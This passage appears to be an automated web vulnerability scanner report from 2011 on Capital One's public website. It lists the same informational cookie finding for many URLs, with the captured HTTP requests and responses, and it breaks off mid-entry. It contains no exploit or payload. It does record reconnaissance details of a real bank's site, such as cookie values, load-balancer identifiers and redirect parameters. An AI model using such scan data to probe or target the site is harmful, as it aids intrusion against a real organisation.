<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="https://www.capitalone. ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /legal/security.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 02 Feb 2011 22:12:42 GMT Server: Apache Location: http://www.capitalone.com/protection/security/index.php Cache-Control: max-age=0 Expires: Wed, 02 Feb 2011 22:12:42 GMT Content-Length: 263 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.capitalone.c ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /legal/terms.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:42 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 29875
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Capital One ­ Terms and Conditions</title> <link href="/stylesheets/ ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /loans/?linkid=WWW_1009_PERS_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_H1_14_T_LNHPR HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:23 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:23 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 22518
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Capital One offer ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /media/pdf/Foreign_Bank_Account_Certification_-_Capital_One.pdf HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:43 GMT Server: Apache Cache-Control: max-age=3600 Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 04 Dec 2009 19:11:12 GMT Accept-Ranges: bytes Content-Length: 207453 Vary: User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: application/pdf Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
%PDF-1.4%.... 16 0 obj <</Linearized 1/L 207453/O 18/E 75169/N 4/T 207086/H [ 436 150]>>endobj xref 16 7 0000000016 00000 n 0000000586 00000 n 0000000648 00000 n 0000000779 0 ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /onlinebanking/overview.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:36 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:12:36 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 23649
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title> Capi ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /onlineopinionF3cS/oo_conf_en-US.js HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:44 GMT Server: Apache Last-Modified: Mon, 29 Jun 2009 18:38:55 GMT Accept-Ranges: bytes Content-Length: 1602 Expires: Thu, 03 Feb 2011 22:12:44 GMT Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: application/x-javascript Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
/* OnlineOpinion (F3cS,en-US) */ /* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */ var O_pth='/online ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /onlineopinionF3cS/oo_engine.js HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:44 GMT Server: Apache Last-Modified: Mon, 12 Jun 2006 14:35:32 GMT Accept-Ranges: bytes Content-Length: 7305 Expires: Thu, 03 Feb 2011 22:12:44 GMT Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: application/x-javascript Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
/* OnlineOpinion (F3cS,8448b) */ /* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */ var custom_var,O_t ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /personalloans/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:27 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:27 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 21748
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Personal Loans: A ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /protection/privacy/index.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:36 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:12:36 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 23417
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Capit ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /protection/security/index.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:37 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:12:37 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 26756
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Capit ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /redirect.php?Log=1&linkid=WWW_1009_CARD_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_H1_04_T_EXP&dest=https://cardfinder.capitalone.com/CapOne/findMyOffer.do?ex=R&pr=&id=&tg=4 HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 302 Found Date: Wed, 02 Feb 2011 22:11:48 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponecc=channel%3DUNS%2A20090715%3Atestgroup%3Dtg11%2A20110113; path=/; domain=.capitalone.com Set-Cookie: caponesn=f5b8a110S04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3NjAA%3D%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=f9be28ebS04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3PjmqKSgtyQ1OKS9KL80gKgNkuILkNDoEagojygcQA%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com Location: https://cardfinder.capitalone.com/CapOne/findMyOffer.do?ex=R&pr=&id=&tg=20&pnt=ZZZZ00ZZZZZZZZZZZZZZ&ch=UNS&wtg=11 Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Content-Length: 1 Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /rewards/index.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:11:50 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:11:50 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 26772
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Credi ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /rewards/service-login.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:11:49 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D4; expires=Thu, 02-Feb-2012 22:11:49 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 20960
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>No Ha ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sitemap/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:34 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:34 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 42178
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Capital One - Sit ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.capitalone.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BIGipServerpl_capitalone.com_443=745088266.65056.0000
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:00:19 GMT Server: Apache Set-Cookie: v1st=FBBE6C4A1C9B8436; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: itc=CAPITALONE11NZZZintmktgD4; expires=Sun, 03-Apr-2011 22:00:19 GMT; path=/; domain=.capitalone.com Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:00:19 GMT; path=/; domain=.capitalone.com Set-Cookie: caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; expires=Fri, 04-Mar-2011 22:00:19 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:00:18 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Keep-Alive: timeout=5, max=50 Connection: Keep-Alive Content-Type: text/html; charset=ISO-8859-1 Content-Length: 39529
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /creditcards/gateway/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 02 Feb 2011 22:12:45 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponecc=channel%3DUNS%2A20090715%3Atestgroup%3Dtg11%2A20110113; path=/; domain=.capitalone.com Set-Cookie: caponesn=f5b8a110S04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3NjAA%3D%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=test; path=/creditcards/; domain=www.capitalone.com Location: http://www.capitalone.com/creditcards/? Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Content-Length: 0 Connection: close Content-Type: text/html; charset=ISO-8859-1
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /indexn.php HTTP/1.1 Host: www.capitalone.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.capitalone.c ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
